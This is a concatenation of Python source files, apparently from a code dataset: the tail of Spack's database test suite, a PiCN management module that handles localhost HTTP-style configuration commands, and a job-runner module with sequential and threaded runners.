spec = spack.spec.Spec('x')
spec.concretize()
downstream_db.add(spec, downstream_layout)
upstream_write_db.add(spec, upstream_layout)
upstream_db._read()
upstream, record = downstream_db.query_by_spec_hash(spec.dag_hash())
# Even though the package is recorded as installed in the upstream DB,
# we prefer the locally-installed instance
assert not upstream
qresults = downstream_db.query('x')
assert len(qresults) == 1
queried_spec, = qresults
try:
orig_db = spack.store.db
spack.store.db = downstream_db
assert queried_spec.prefix == downstream_layout.path_for_spec(spec)
finally:
spack.store.db = orig_db
@pytest.mark.usefixtures('config')
def test_cannot_write_upstream(tmpdir_factory, test_store, gen_mock_layout):
roots = [str(tmpdir_factory.mktemp(x)) for x in ['a', 'b']]
layouts = [gen_mock_layout(x) for x in ['/ra/', '/rb/']]
mock_repo = MockPackageMultiRepo()
mock_repo.add_package('x', [], [])
# Instantiate the database that will be used as the upstream DB and make
# sure it has an index file
upstream_db_independent = spack.database.Database(roots[1])
with upstream_db_independent.write_transaction():
pass
upstream_dbs = spack.store._construct_upstream_dbs_from_install_roots(
[roots[1]], _test=True)
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('x')
spec.concretize()
with pytest.raises(spack.database.ForbiddenLockError):
upstream_dbs[0].add(spec, layouts[1])
@pytest.mark.usefixtures('config')
def test_recursive_upstream_dbs(tmpdir_factory, test_store, gen_mock_layout):
roots = [str(tmpdir_factory.mktemp(x)) for x in ['a', 'b', 'c']]
layouts = [gen_mock_layout(x) for x in ['/ra/', '/rb/', '/rc/']]
default = ('build', 'link')
mock_repo = MockPackageMultiRepo()
z = mock_repo.add_package('z', [], [])
y = mock_repo.add_package('y', [z], [default])
mock_repo.add_package('x', [y], [default])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('x')
spec.concretize()
db_c = spack.database.Database(roots[2])
db_c.add(spec['z'], layouts[2])
db_b = spack.database.Database(roots[1], upstream_dbs=[db_c])
db_b.add(spec['y'], layouts[1])
db_a = spack.database.Database(roots[0], upstream_dbs=[db_b, db_c])
db_a.add(spec['x'], layouts[0])
upstream_dbs_from_scratch = (
spack.store._construct_upstream_dbs_from_install_roots(
[roots[1], roots[2]], _test=True))
db_a_from_scratch = spack.database.Database(
roots[0], upstream_dbs=upstream_dbs_from_scratch)
assert db_a_from_scratch.db_for_spec_hash(spec.dag_hash()) == (
db_a_from_scratch)
assert db_a_from_scratch.db_for_spec_hash(spec['y'].dag_hash()) == (
upstream_dbs_from_scratch[0])
assert db_a_from_scratch.db_for_spec_hash(spec['z'].dag_hash()) == (
upstream_dbs_from_scratch[1])
db_a_from_scratch._check_ref_counts()
upstream_dbs_from_scratch[0]._check_ref_counts()
upstream_dbs_from_scratch[1]._check_ref_counts()
assert (db_a_from_scratch.installed_relatives(spec) ==
set(spec.traverse(root=False)))
assert (db_a_from_scratch.installed_relatives(
spec['z'], direction='parents') == set([spec, spec['y']]))
@pytest.fixture()
def usr_folder_exists(monkeypatch):
"""The ``/usr`` folder is assumed to be existing in some tests. This
fixture makes it such that its existence is mocked, so we have no
requirements on the system running tests.
"""
isdir = os.path.isdir
@functools.wraps(os.path.isdir)
def mock_isdir(path):
if path == '/usr':
return True
return isdir(path)
monkeypatch.setattr(os.path, 'isdir', mock_isdir)
def _print_ref_counts():
"""Print out all ref counts for the graph used here, for debugging"""
recs = []
def add_rec(spec):
cspecs = spack.store.db.query(spec, installed=any)
if not cspecs:
recs.append("[ %-7s ] %-20s-" % ('', spec))
else:
key = cspecs[0].dag_hash()
rec = spack.store.db.get_record(cspecs[0])
recs.append("[ %-7s ] %-20s%d" % (key[:7], spec, rec.ref_count))
with spack.store.db.read_transaction():
add_rec('mpileaks ^mpich')
add_rec('callpath ^mpich')
add_rec('mpich')
add_rec('mpileaks ^mpich2')
add_rec('callpath ^mpich2')
add_rec('mpich2')
add_rec('mpileaks ^zmpi')
add_rec('callpath ^zmpi')
add_rec('zmpi')
add_rec('fake')
add_rec('dyninst')
add_rec('libdwarf')
add_rec('libelf')
colify(recs, cols=3)
def _check_merkleiness():
"""Ensure the spack database is a valid merkle graph."""
all_specs = spack.store.db.query(installed=any)
seen = {}
for spec in all_specs:
for dep in spec.dependencies():
hash_key = dep.dag_hash()
if hash_key not in seen:
seen[hash_key] = id(dep)
else:
assert seen[hash_key] == id(dep)
def _check_db_sanity(database):
"""Utiilty function to check db against install layout."""
pkg_in_layout = sorted(spack.store.layout.all_specs())
actual = sorted(database.query())
externals = sorted([x for x in actual if x.external])
nexpected = len(pkg_in_layout) + len(externals)
assert nexpected == len(actual)
non_external_in_db = sorted([x for x in actual if not x.external])
for e, a in zip(pkg_in_layout, non_external_in_db):
assert e == a
_check_merkleiness()
def _check_remove_and_add_package(database, spec):
"""Remove a spec from the DB, then add it and make sure everything's
still ok once it is added. This checks that it was
removed, that it's back when added again, and that ref
counts are consistent.
"""
original = database.query()
database._check_ref_counts()
# Remove spec
concrete_spec = database.remove(spec)
database._check_ref_counts()
remaining = database.query()
# ensure spec we removed is gone
assert len(original) - 1 == len(remaining)
assert all(s in original for s in remaining)
assert concrete_spec not in remaining
# add it back and make sure everything is ok.
database.add(concrete_spec, spack.store.layout)
installed = database.query()
assert concrete_spec in installed
assert installed == original
# sanity check against direcory layout and check ref counts.
_check_db_sanity(database)
database._check_ref_counts()
def _mock_install(spec):
s = spack.spec.Spec(spec)
s.concretize()
pkg = spack.repo.get(s)
pkg.do_install(fake=True)
def _mock_remove(spec):
specs = spack.store.db.query(spec)
assert len(specs) == 1
spec = specs[0]
spec.package.do_uninstall(spec)
def test_default_queries(database):
# Testing a package whose name *doesn't* start with 'lib'
# to ensure the library has 'lib' prepended to the name
rec = database.get_record('zmpi')
spec = rec.spec
libraries = spec['zmpi'].libs
assert len(libraries) == 1
assert libraries.names[0] == 'zmpi'
headers = spec['zmpi'].headers
assert len(headers) == 1
assert headers.names[0] == 'zmpi'
command = spec['zmpi'].command
assert isinstance(command, Executable)
assert command.name == 'zmpi'
assert os.path.exists(command.path)
# Testing a package whose name *does* start with 'lib'
# to ensure the library doesn't have a double 'lib' prefix
rec = database.get_record('libelf')
spec = rec.spec
libraries = spec['libelf'].libs
assert len(libraries) == 1
assert libraries.names[0] == 'elf'
headers = spec['libelf'].headers
assert len(headers) == 1
assert headers.names[0] == 'libelf'
command = spec['libelf'].command
assert isinstance(command, Executable)
assert command.name == 'libelf'
assert os.path.exists(command.path)
def test_005_db_exists(database):
"""Make sure db cache file exists after creating."""
index_file = os.path.join(database.root, '.spack-db', 'index.json')
lock_file = os.path.join(database.root, '.spack-db', 'lock')
assert os.path.exists(str(index_file))
assert os.path.exists(str(lock_file))
def test_010_all_install_sanity(database):
"""Ensure that the install layout reflects what we think it does."""
all_specs = spack.store.layout.all_specs()
assert len(all_specs) == 14
# Query specs with multiple configurations
mpileaks_specs = [s for s in all_specs if s.satisfies('mpileaks')]
callpath_specs = [s for s in all_specs if s.satisfies('callpath')]
mpi_specs = [s for s in all_specs if s.satisfies('mpi')]
assert len(mpileaks_specs) == 3
assert len(callpath_specs) == 3
assert len(mpi_specs) == 3
# Query specs with single configurations
dyninst_specs = [s for s in all_specs if s.satisfies('dyninst')]
libdwarf_specs = [s for s in all_specs if s.satisfies('libdwarf')]
libelf_specs = [s for s in all_specs if s.satisfies('libelf')]
assert len(dyninst_specs) == 1
assert len(libdwarf_specs) == 1
assert len(libelf_specs) == 1
# Query by dependency
assert len(
[s for s in all_specs if s.satisfies('mpileaks ^mpich')]
) == 1
assert len(
[s for s in all_specs if s.satisfies('mpileaks ^mpich2')]
) == 1
assert len(
[s for s in all_specs if s.satisfies('mpileaks ^zmpi')]
) == 1
def test_015_write_and_read(mutable_database):
# write and read DB
with spack.store.db.write_transaction():
specs = spack.store.db.query()
recs = [spack.store.db.get_record(s) for s in specs]
for spec, rec in zip(specs, recs):
new_rec = spack.store.db.get_record(spec)
assert new_rec.ref_count == rec.ref_count
assert new_rec.spec == rec.spec
assert new_rec.path == rec.path
assert new_rec.installed == rec.installed
def test_017_write_and_read_without_uuid(mutable_database, monkeypatch):
monkeypatch.setattr(spack.database, '_use_uuid', False)
# write and read DB
with spack.store.db.write_transaction():
specs = spack.store.db.query()
recs = [spack.store.db.get_record(s) for s in specs]
for spec, rec in zip(specs, recs):
new_rec = spack.store.db.get_record(spec)
assert new_rec.ref_count == rec.ref_count
assert new_rec.spec == rec.spec
assert new_rec.path == rec.path
assert new_rec.installed == rec.installed
def test_020_db_sanity(database):
"""Make sure query() returns what's actually in the db."""
_check_db_sanity(database)
def test_025_reindex(mutable_database):
"""Make sure reindex works and ref counts are valid."""
spack.store.store.reindex()
_check_db_sanity(mutable_database)
def test_026_reindex_after_deprecate(mutable_database):
"""Make sure reindex works and ref counts are valid after deprecation."""
mpich = mutable_database.query_one('mpich')
zmpi = mutable_database.query_one('zmpi')
mutable_database.deprecate(mpich, zmpi)
spack.store.store.reindex()
_check_db_sanity(mutable_database)
def test_030_db_sanity_from_another_process(mutable_database):
def read_and_modify():
# check that other process can read DB
_check_db_sanity(mutable_database)
with mutable_database.write_transaction():
_mock_remove('mpileaks ^zmpi')
p = multiprocessing.Process(target=read_and_modify, args=())
p.start()
p.join()
# ensure child process change is visible in parent process
with mutable_database.read_transaction():
assert len(mutable_database.query('mpileaks ^zmpi')) == 0
def test_040_ref_counts(database):
"""Ensure that we got ref counts right when we read the DB."""
database._check_ref_counts()
def test_041_ref_counts_deprecate(mutable_database):
"""Ensure that we have appropriate ref counts after deprecating"""
mpich = mutable_database.query_one('mpich')
zmpi = mutable_database.query_one('zmpi')
mutable_database.deprecate(mpich, zmpi)
mutable_database._check_ref_counts()
def test_050_basic_query(database):
"""Ensure querying database is consistent with what is installed."""
# query everything
assert len(spack.store.db.query()) == 16
# query specs with multiple configurations
mpileaks_specs = database.query('mpileaks')
callpath_specs = database.query('callpath')
mpi_specs = database.query('mpi')
assert len(mpileaks_specs) == 3
assert len(callpath_specs) == 3
assert len(mpi_specs) == 3
# query specs with single configurations
dyninst_specs = database.query('dyninst')
libdwarf_specs = database.query('libdwarf')
libelf_specs = database.query('libelf')
assert len(dyninst_specs) == 1
assert len(libdwarf_specs) == 1
assert len(libelf_specs) == 1
# Query by dependency
assert len(database.query('mpileaks ^mpich')) == 1
assert len(database.query('mpileaks ^mpich2')) == 1
assert len(database.query('mpileaks ^zmpi')) == 1
# Query by date
assert len(database.query(start_date=datetime.datetime.min)) == 16
assert len(database.query(start_date=datetime.datetime.max)) == 0
assert len(database.query(end_date=datetime.datetime.min)) == 0
assert len(database.query(end_date=datetime.datetime.max)) == 16
def test_060_remove_and_add_root_package(mutable_database):
_check_remove_and_add_package(mutable_database, 'mpileaks ^mpich')
def test_070_remove_and_add_dependency_package(mutable_database):
_check_remove_and_add_package(mutable_database, 'dyninst')
def test_080_root_ref_counts(mutable_database):
rec = mutable_database.get_record('mpileaks ^mpich')
# Remove a top-level spec from the DB
mutable_database.remove('mpileaks ^mpich')
# record no longer in DB
assert mutable_database.query('mpileaks ^mpich', installed=any) == []
# record's deps have updated ref_counts
assert mutable_database.get_record('callpath ^mpich').ref_count == 0
assert mutable_database.get_record('mpich').ref_count == 1
# Put the spec back
mutable_database.add(rec.spec, spack.store.layout)
# record is present again
assert len(mutable_database.query('mpileaks ^mpich', installed=any)) == 1
# dependencies have ref counts updated
assert mutable_database.get_record('callpath ^mpich').ref_count == 1
assert mutable_database.get_record('mpich').ref_count == 2
def test_090_non_root_ref_counts(mutable_database):
mutable_database.get_record('mpileaks ^mpich')
mutable_database.get_record('callpath ^mpich')
# "force remove" a non-root spec from the DB
mutable_database.remove('callpath ^mpich')
# record still in DB but marked uninstalled
assert mutable_database.query('callpath ^mpich', installed=True) == []
assert len(mutable_database.query('callpath ^mpich', installed=any)) == 1
# record and its deps have same ref_counts
assert mutable_database.get_record(
'callpath ^mpich', installed=any
).ref_count == 1
assert mutable_database.get_record('mpich').ref_count == 2
# remove only dependent of uninstalled callpath record
mutable_database.remove('mpileaks ^mpich')
# record and parent are completely gone.
assert mutable_database.query('mpileaks ^mpich', installed=any) == []
assert mutable_database.query('callpath ^mpich', installed=any) == []
# mpich ref count updated properly.
mpich_rec = mutable_database.get_record('mpich')
assert mpich_rec.ref_count == 0
def test_100_no_write_with_exception_on_remove(database):
def fail_while_writing():
with database.write_transaction():
_mock_remove('mpileaks ^zmpi')
raise Exception()
with database.read_transaction():
assert len(database.query('mpileaks ^zmpi', installed=any)) == 1
with pytest.raises(Exception):
fail_while_writing()
# reload DB and make sure zmpi is still there.
with database.read_transaction():
assert len(database.query('mpileaks ^zmpi', installed=any)) == 1
def test_110_no_write_with_exception_on_install(database):
def fail_while_writing():
with database.write_transaction():
_mock_install('cmake')
raise Exception()
with database.read_transaction():
assert database.query('cmake', installed=any) == []
with pytest.raises(Exception):
fail_while_writing()
# reload DB and make sure cmake was not written.
with database.read_transaction():
assert database.query('cmake', installed=any) == []
def test_115_reindex_with_packages_not_in_repo(mutable_database):
# Dont add any package definitions to this repository, the idea is that
# packages should not have to be defined in the repository once they
# are installed
with spack.repo.swap(MockPackageMultiRepo()):
spack.store.store.reindex()
_check_db_sanity(mutable_database)
def test_external_entries_in_db(mutable_database):
rec = mutable_database.get_record('mpileaks ^zmpi')
assert rec.spec.external_path is None
assert rec.spec.external_module is None
rec = mutable_database.get_record('externaltool')
assert rec.spec.external_path == '/path/to/external_tool'
assert rec.spec.external_module is None
assert rec.explicit is False
rec.spec.package.do_install(fake=True, explicit=True)
rec = mutable_database.get_record('externaltool')
assert rec.spec.external_path == '/path/to/external_tool'
assert rec.spec.external_module is None
assert rec.explicit is True
@pytest.mark.regression('8036')
def test_regression_issue_8036(mutable_database, usr_folder_exists):
# The test ensures that the external package prefix is treated as
# existing. Even when the package prefix exists, the package should
# not be considered installed until it is added to the database with
# do_install.
s = spack.spec.Spec('externaltool@0.9')
s.concretize()
assert not s.package.installed
# Now install the external package and check again the `installed` property
s.package.do_install(fake=True)
assert s.package.installed
@pytest.mark.regression('11118')
def test_old_external_entries_prefix(mutable_database):
with open(spack.store.db._index_path, 'r') as f:
db_obj = json.loads(f.read())
s = spack.spec.Spec('externaltool')
s.concretize()
db_obj['database']['installs'][s.dag_hash()]['path'] = 'None'
with open(spack.store.db._index_path, 'w') as f:
f.write(json.dumps(db_obj))
if _use_uuid:
with open(spack.store.db._verifier_path, 'w') as f:
f.write(str(uuid.uuid4()))
record = spack.store.db.get_record(s)
assert record.path is None
assert record.spec._prefix is None
assert record.spec.prefix == record.spec.external_path
def test_uninstall_by_spec(mutable_database):
with mutable_database.write_transaction():
for spec in mutable_database.query():
if spec.package.installed:
spack.package.PackageBase.uninstall_by_spec(spec, force=True)
else:
mutable_database.remove(spec)
assert len(mutable_database.query()) == 0
def test_query_unused_specs(mutable_database):
# This spec installs a fake cmake as a build only dependency
s = spack.spec.Spec('simple-inheritance')
s.concretize()
s.package.do_install(fake=True, explicit=True)
unused = spack.store.db.unused_specs
assert len(unused) == 1
assert unused[0].name == 'cmake'
@pytest.mark.regression('10019')
def test_query_spec_with_conditional_dependency(mutable_database):
# The issue is triggered by having dependencies that are
# conditional on a Boolean variant
s = spack.spec.Spec('hdf5~mpi')
s.concretize()
s.package.do_install(fake=True, explicit=True)
results = spack.store.db.query_local('hdf5 ^mpich')
assert not results
@pytest.mark.regression('10019')
def test_query_spec_with_non_conditional_virtual_dependency(database):
# Ensure the same issue doesn't come up for virtual
# dependency that are not conditional on variants
results = spack.store.db.query_local('mpileaks ^mpich')
assert len(results) == 1
def test_failed_spec_path_error(database):
"""Ensure spec not concrete check is covered."""
s = spack.spec.Spec('a')
with pytest.raises(ValueError, match='Concrete spec required'):
spack.store.db._failed_spec_path(s)
@pytest.mark.db
def test_clear_failure_keep(mutable_database, monkeypatch, capfd):
"""Add test coverage for clear_failure operation when to be retained."""
def _is(db, spec):
return True
# Pretend the spec has been failure locked
monkeypatch.setattr(spack.database.Database, 'prefix_failure_locked', _is)
s = spack.spec.Spec('a')
spack.store.db.clear_failure(s)
out = capfd.readouterr()[0]
assert 'Retaining failure marking' in out
@pytest.mark.db
def test_clear_failure_forced(mutable_database, monkeypatch, capfd):
"""Add test coverage for clear_failure operation when force."""
def _is(db, spec):
return True
# Pretend the spec has been failure locked
monkeypatch.setattr(spack.database.Database, 'prefix_failure_locked', _is)
# Ensure raise OSError when try to remove the non-existent marking
monkeypatch.setattr(spack.database.Database, 'prefix_failure_marked', _is)
s = spack.spec.Spec('a').concretized()
spack.store.db.clear_failure(s, force=True)
out = capfd.readouterr()[1]
assert 'Removing failure marking despite lock' in out
assert 'Unable to remove failure marking' in out
@pytest.mark.db
def test_mark_failed(mutable_database, monkeypatch, tmpdir, capsys):
"""Add coverage to mark_failed."""
def _raise_exc(lock):
raise lk.LockTimeoutError('Mock acquire_write failure')
# Ensure attempt to acquire write lock on the mark raises the exception
monkeypatch.setattr(lk.Lock, 'acquire_write', _raise_exc)
with tmpdir.as_cwd():
s = spack.spec.Spec('a').concretized()
spack.store.db.mark_failed(s)
out = str(capsys.readouterr()[1])
assert 'Unable to mark a as failed' in out
# Clean up the failure mark to ensure it does not interfere with other
# tests using the same spec.
del spack.store.db._prefix_failures[s.prefix]
@pytest.mark.db
def test_prefix_failed(mutable_database, monkeypatch):
"""Add coverage to prefix_failed operation."""
def _is(db, spec):
return True
s = spack.spec.Spec('a').concretized()
# Confirm the spec is not already marked as failed
assert not spack.store.db.prefix_failed(s)
# Check that a failure entry is sufficient
spack.store.db._prefix_failures[s.prefix] = None
assert spack.store.db.prefix_failed(s)
# Remove the entry and check again
del spack.store.db._prefix_failures[s.prefix]
assert not spack.store.db.prefix_failed(s)
# Now pretend that the prefix failure is locked
monkeypatch.setattr(spack.database.Database, 'prefix_failure_locked', _is)
assert spack.store.db.prefix_failed(s)
def test_prefix_read_lock_error(mutable_database, monkeypatch):
"""Cover the prefix read lock exception."""
def _raise(db, spec):
raise lk.LockError('Mock lock error')
s = spack.spec.Spec('a').concretized()
# Ensure subsequent lock operations fail
monkeypatch.setattr(lk.Lock, 'acquire_read', _raise)
with pytest.raises(Exception):
with spack.store.db.prefix_read_lock(s):
assert False
def test_prefix_write_lock_error(mutable_database, monkeypatch):
"""Cover the prefix write lock exception."""
def _raise(db, spec):
raise lk.LockError('Mock lock error')
s = spack.spec.Spec('a').concretized()
# Ensure subsequent lock operations fail
monkeypatch.setattr(lk.Lock, 'acquire_write', _raise)
with pytest.raises(Exception):
with spack.store.db.prefix_write_lock(s):
assert False
|
Mgmt.py
|
"""Mgmt System for PiCN"""
import multiprocessing
import os
import select
import socket
import time
from typing import Dict
from PiCN.Layers.ICNLayer.ContentStore import BaseContentStore
from PiCN.Layers.ICNLayer.ForwardingInformationBase import BaseForwardingInformationBase
from PiCN.Layers.ICNLayer.PendingInterestTable import BasePendingInterestTable
from PiCN.Packets import Content, Name
from PiCN.Processes import LayerProcess
from PiCN.Processes import PiCNProcess
from PiCN.Layers.LinkLayer.Interfaces import AddressInfo, BaseInterface, UDP4Interface
class Mgmt(PiCNProcess):
"""Mgmt System for PiCN"""
def __init__(self, cs: BaseContentStore, fib: BaseForwardingInformationBase, pit:BasePendingInterestTable,
linklayer: LayerProcess, port: int, shutdown = None,
repo_prfx: str=None, repo_path: str=None, log_level=255):
super().__init__("MgmtSys", log_level)
self.cs = cs
self.fib = fib
self.pit = pit
self._linklayer = linklayer
self._repo_prfx = repo_prfx
self._repo_path = repo_path
self._port: int = port
# init MGMT
self.mgmt_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.mgmt_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.mgmt_sock.bind(("127.0.0.1", self._port))
self.mgmt_sock.listen(5)
self._buffersize = 8192
if os.name is not 'nt':
self.shutdown = shutdown #function pointer
else:
self.logger.critical("Shutdown not available on NT platform")
def mgmt(self, mgmt_sock):
"""parse mgmt message"""
replysock, addr = mgmt_sock.accept()
try:
# receive data
data = replysock.recv(self._buffersize)
request_string = data.decode()
# Parse HTTP
fields = request_string.split("\r\n")
request: str = fields[0]
fields = fields[1:]
type, name = request.split(" ", 1)
httpversion = request.rsplit(" ", 1)[-1]
http = {}
for field in fields:
if (len(field.split(":")) == 2):
key, value = field.split(':', 1)
http[key] = value
# Execute MGMT
name = name.replace(" HTTP/1.1", "")
mgmt_request = name.split("/")
if (len(mgmt_request) == 4):
layer = mgmt_request[1]
command = mgmt_request[2]
params = mgmt_request[3]
if (layer == "linklayer"):
self.ll_mgmt(command, params, replysock)
elif(layer == "icnlayer"):
self.icnl_mgmt(command, params, replysock)
elif(layer == "repolayer"):
self.repol_mgmt(command, params, replysock)
elif len(mgmt_request) == 2:
if mgmt_request[1] == "shutdown":
self.logger.info("Shutdown")
replysock.send("HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n shutdown\r\n".encode())
replysock.close()
time.sleep(2)
self.shutdown()
finally:
replysock.close()
def ll_mgmt(self, command, params, replysock):
# newface expects /linklayer/newface/ip:port
if (command == "newface"):
ip, port, if_num = params.split(":", 2)
if port != 'None':
port = int(port)
if_num = int(if_num)
if port != 'None':
fid = self._linklayer.faceidtable.get_or_create_faceid(AddressInfo((ip, port), if_num))
else:
fid = self._linklayer.faceidtable.get_or_create_faceid(AddressInfo(ip, if_num))
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n newface OK:" + str(fid) + "\r\n"
replysock.send(reply.encode())
self.logger.info("New Face added " + ip + "|" + str(port) + ", FaceID: " + str(fid))
else:
self.unknown_command(replysock)
return
def icnl_mgmt(self, command, params, replysock):
if(self.cs == None or self.fib == None or
self.pit== None):
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n Not a Forwarder OK\r\n"
replysock.send(reply.encode())
# newface expects /linklayer/newface/ip:port
elif (command == "newforwardingrule"):
prefix, faceid = params.split(":", 1)
faceid_str = faceid
faceid = faceid.split(',')
faceid = list(map(lambda x: int(x), faceid))
prefix = prefix.replace("%2F", "/")
name = Name(prefix)
self.fib.add_fib_entry(name, faceid, True)
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n newforwardingrule OK:" + str(faceid_str) + "\r\n"
replysock.send(reply.encode())
self.logger.info("New Forwardingrule added " + prefix + "|" + str(faceid))
return
elif(command == "newcontent"):
prefix, content = params.split(":", 1)
prefix = prefix.replace("%2F", "/")
name = Name(prefix)
content = Content(name, content)
self.cs.add_content_object(content, static=True)
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n newcontent OK\r\n"
replysock.send(reply.encode())
self.logger.info("New content added " + prefix + "|" + content.content)
return
else:
self.unknown_command(replysock)
return
def repol_mgmt(self, command, params, replysock):
if(self._repo_path == None or self._repo_prfx == None):
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n Not a Repo OK\r\n"
replysock.send(reply.encode())
elif(command == "getprefix"):
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n " + str(self._repo_prfx) + " OK\r\n"
replysock.send(reply.encode())
elif(command =="getpath"):
abs_path = os.path.abspath(str(self._repo_path))
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n " + str(abs_path) + " OK\r\n"
replysock.send(reply.encode())
else:
self.unknown_command(replysock)
return
def unknown_command(self, replysock):
reply = "HTTP/1.1 200 OK \r\n Content-Type: text/html \r\n\r\n Unknown Command\r\n"
replysock.send(reply.encode())
def _run_select(self, mgmt_sock):
while True:
socks = [mgmt_sock]
ready_vars, _, _ = select.select(socks, [], [])
self.mgmt(mgmt_sock)
def _run_poll(self, mgmt_sock):
poller = select.poll()
READ_ONLY = select.POLLIN | select.POLLPRI | select.POLLHUP | select.POLLERR
poller.register(mgmt_sock, READ_ONLY)
while True:
ready_vars = poller.poll()
self.mgmt(mgmt_sock)
def _run(self, mgmt_sock):
if os.name is 'nt':
self._run_select(mgmt_sock)
else:
self._run_poll(mgmt_sock)
def start_process(self):
self._process = multiprocessing.Process(target=self._run, args=[self.mgmt_sock])
self._process.start()
def stop_process(self):
if self._process is not None:
self._process.terminate()
self._process = None
self.mgmt_sock.close()
def __del__(self):
try:
self.mgmt_sock.close()
except:
pass
|
job.py
|
"""
**job** module handles all the job running logic:
- consistent exception handling and logging
- currently 2 job runners are implemented:
- SimpleJobRunner runs the jobs sequentially.
- ParallelJobRunner queues the jobs and run them in a dedicated thread
"""
from concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor, as_completed
from enum import Enum, auto
import logging
import multiprocessing
import queue
import signal
import threading
import time
from .utils import Namespace, Timer, InterruptTimeout, raise_in_thread, signal_handler
log = logging.getLogger(__name__)
class State(Enum):
created = auto()
cancelled = auto()
running = auto()
rescheduled = auto()
stopping = auto()
stopped = auto()
class JobError(Exception):
pass
class InvalidStateError(JobError):
pass
class CancelledError(JobError):
pass
class Job:
def __init__(self, name="", timeout_secs=None, priority=None):
self.name = name
self.timeout = timeout_secs
self.priority = priority
self.state = State.created
self.thread_id = None
def start(self):
try:
start_msg = "Starting job {}.".format(self.name)
self.thread_id = threading.current_thread().ident
if self.state == State.stopping:
self.state = State.cancelled
raise CancelledError("Job was cancelled.")
elif self.state != State.created:
self.state = State.cancelled
raise InvalidStateError("Job can't be started from state `{}`.".format(self.state))
log.info("\n%s\n%s", '-'*len(start_msg), start_msg)
self.state = State.running
self._prepare()
with Timer() as t:
# don't propagate interruption error here (sig=None) so that we can collect the timeout in the result
with InterruptTimeout(self.timeout, sig=None):
result = self._run()
log.info("Job %s executed in %.3f seconds.", self.name, t.duration)
log.debug("Job %s returned: %s", self.name, result)
return result, t.duration
except Exception as e:
log.error("Job `%s` failed with error: %s", self.name, str(e))
log.exception(e)
return None, -1
def stop(self):
try:
self.state = State.stopping
self._stop()
return 0
except Exception as e:
log.exception(e)
return 1
def done(self):
try:
if self.state in [State.rescheduled, State.running, State.stopping]:
self._on_done()
except Exception as e:
log.error("Job `%s` completion failed with error: %s", self.name, str(e))
log.exception(e)
finally:
if self.state is State.rescheduled:
self.reset()
else:
self.reset(State.stopped)
def reschedule(self):
self.state = State.rescheduled
self.thread_id = None
def reset(self, state=State.created):
self.state = state
self.thread_id = None
def _prepare(self):
"""hood to execute pre-run logic: this is executed in the same thread as the run logic."""
pass
def _run(self):
"""jobs should implement their run logic in this method."""
pass
def _stop(self):
if self.thread_id is not None:
raise_in_thread(self.thread_id, CancelledError)
def _on_done(self):
"""hook to execute logic after job completion in a thread-safe way as this is executed in the main thread."""
pass
class JobRunner:
def __init__(self, jobs):
self.jobs = jobs
self.results = []
self.state = State.created
self._queue = None
self._last_priority = 0
def start(self):
if self.state != State.created:
raise InvalidStateError(self.state)
self._init_queue()
self.state = State.running
with Timer() as t:
self._run()
self.state = State.stopped
log.info("All jobs executed in %.3f seconds.", t.duration)
return self.results
def stop(self):
self.state = State.stopping
self._queue.put((-1, None))
return self._stop()
def stop_if_complete(self):
if 0 < len(self.jobs) == len(self.results):
self.stop()
def put(self, job, priority=None):
if priority is None:
if job.priority is None:
job.priority = self._last_priority = self._last_priority+1
else:
job.priority = priority
self._queue.put((job.priority, job))
def _init_queue(self):
self._queue = queue.PriorityQueue(maxsize=len(self.jobs))
for job in self.jobs:
self.put(job)
def __iter__(self):
return self
def __next__(self):
if self._queue is None:
return
_, job = self._queue.get()
self._queue.task_done()
if job is None:
self._queue = None
return
return job
def _run(self):
pass
def _stop(self):
for job in self.jobs:
job.stop()
class SimpleJobRunner(JobRunner):
def _run(self):
for job in self:
if self.state == State.stopping:
break
result, duration = job.start()
if job.state is not State.rescheduled:
self.results.append(Namespace(name=job.name, result=result, duration=duration))
job.done()
self.stop_if_complete()
class MultiThreadingJobRunner(JobRunner):
def __init__(self, jobs, parallel_jobs=1, done_async=True, delay_secs=0, use_daemons=False):
super().__init__(jobs)
self.parallel_jobs = parallel_jobs
self._done_async = done_async
self._delay = delay_secs # short sleep between enqueued jobs to make console more readable
self._daemons = use_daemons
def _run(self):
signal_handler(signal.SIGINT, self.stop)
q = queue.Queue()
def worker():
while True:
job = q.get()
if job is None or self.state == State.stopping:
q.task_done()
break
result, duration = job.start()
if job.state is not State.rescheduled:
self.results.append(Namespace(name=job.name, result=result, duration=duration))
if self._done_async:
job.done()
self.stop_if_complete()
q.task_done()
threads = []
for thread in range(self.parallel_jobs):
thread = threading.Thread(target=worker, daemon=self._daemons)
thread.start()
threads.append(thread)
try:
for job in self:
if self.state == State.stopping:
break
q.put(job) # TODO: timeout
if self._delay > 0:
time.sleep(self._delay)
q.join()
finally:
for _ in range(self.parallel_jobs):
q.put(None) # stopping workers
for thread in threads:
thread.join()
if not self._done_async:
for job in self.jobs:
job.done()
class MultiProcessingJobRunner(JobRunner):
pass
""" Experimental: trying to simplify multi-threading/processing"""
class ExecutorJobRunner(JobRunner):
def __init__(self, pool_executor_class, jobs, parallel_jobs):
super().__init__(jobs)
self.pool_executor_class = pool_executor_class
self.parallel_jobs = parallel_jobs
def _run(self):
def worker(job):
result, duration = job.start()
job.done()
return Namespace(name=job.name, result=result, duration=duration)
with self.pool_executor_class(max_workers=self.parallel_jobs) as executor:
self.results.extend(executor.map(worker, self.jobs))
# futures = []
# for job in self.jobs:
# future = executor.submit(worker, job)
# # future.add_done_callback(lambda _: job.done())
# futures.append(future)
# for future in as_completed(futures):
# self.results.append(future.result())
class ThreadPoolExecutorJobRunner(ExecutorJobRunner):
def __init__(self, jobs, parallel_jobs):
super().__init__(ThreadPoolExecutor, jobs, parallel_jobs)
class ProcessPoolExecutorJobRunner(ExecutorJobRunner):
def __init__(self, jobs, parallel_jobs):
super().__init__(ProcessPoolExecutor, jobs, parallel_jobs)
|
dataclient.py
